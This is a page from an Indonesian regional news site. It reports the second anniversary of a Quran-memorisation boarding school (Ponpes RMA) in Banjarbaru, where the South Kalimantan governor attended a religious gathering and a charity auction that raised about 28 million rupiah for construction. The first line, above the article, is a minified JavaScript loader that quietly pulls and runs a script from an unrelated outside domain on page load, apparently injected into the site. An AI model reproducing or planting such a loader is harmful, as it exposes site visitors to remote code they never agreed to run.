(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
RELIGI

Tablig Akbar dan Saprah Amal Mengisi Milad ke-2 Ponpes RMA


KANALKALIMANTAN.COM, BANJARBARU – Berdiri sejak 10 Desember 2019, genap dua tahun umur dari Pondok Pesantren (Ponpes) Tahfizhul Qur’an Raudhatul Muta’allimin Annahdliyah (RMA) berdiri di Guntung Manggis, Kecamatan Landasan Ulin, Kota Banjarbaru.

Ponpes RMA memperingati Milad ke-2 menggelar tabligh akbar dan saprah amal bersama Guru Yanur Kalua, Sabtu (11/12/2021).

Gubernur Kalimantan Selatan, H Sahbirin Noor turut berhadir dalam peringatan Milad ini. Orang nomor satu di Kalsel ini tak lupa ia mendoakan serta mengucapkan selamat Milad yang ke-2 kepada Ponpes RMA.

“Semoga selalu mendapatkan berkah, semoga nanti cepat terbangun dan bisa mendidik anak-anak kita dan terus melahirkan guru-guru yang nanti bisa memberikan ilmunya kepada masyarakat,” ucap Paman Birin -sapaan akrabnya-.

 

Baca juga : Kejar Target, Pemkab Banjar Bersama Forkopimda Gelar Vaksinasi Massal

Saat saprah amal, Paman Birin menyahut lelang kemudian menyedekahkan untuk membantu pembangunan Ponpes RMA. Uniknya barang lelang disahut lelangnya oleh Paman Birin dikembalikan ke jama’ah tabligh yang berhadir.

Sementara itu, Pimpinan Ponpes RMA Banjarbaru, Ustadz Muhari mengatakan, Milad ke-2 Ponpes RMA secara khusus mengundang Guru Yanur Kalua, menggelar tabligh sekaligus lelang, dalam majelis yang digelar pada Sabtu setiap dua pekan.

“Mudah-mudahan dengan ini dapat mempercepat pembangunan kami, kemudian bisa menjalin ukhuwah Islamiyah serta membina akhlak masyarakat,” ucapnya.

Diungkap Ustadz Muhari, hasil yang diperoleh ketika lelang dari Paman Birin tidak kurang senilai 28 juta . Barang yang dilelang seperti sorban, sarung, kerudung, jubah, telur, kue dan yang lainnya, semuanya dialokasikan untuk pembangunan Ponpes RMA.

 

Baca juga : Porseni PGRI Banjarbaru 2021 Digelar, Pertandingkan Enam Lomba

“Hasil lelangnya akan kami peruntukkan untuk menambah pembangunan kanopi halaman dan WC,” ujarnya.

Lebih jauh, Muhari menargetkan pembangunan ini diperkirakannya akan selesai pada tahun depan.

“Tahun depan insyaallah, kalau bantuan dari gubernur kemungkinan tahun depat, insyaallah bisa naik lantai dua,” ungkapnya.

Ustadz Muhari mengharapkan usia dua tahun Ponpes RMA, bisa tetap istiqamah sebagai media perjuangan dalam mendidik generasi muslim untuk bisa menghafal Al Qur’an, belajar Al Qur’an dan belajar akhlak. (kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

9 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

9 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

9 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

9 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

10 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

10 jam ago

This website uses cookies.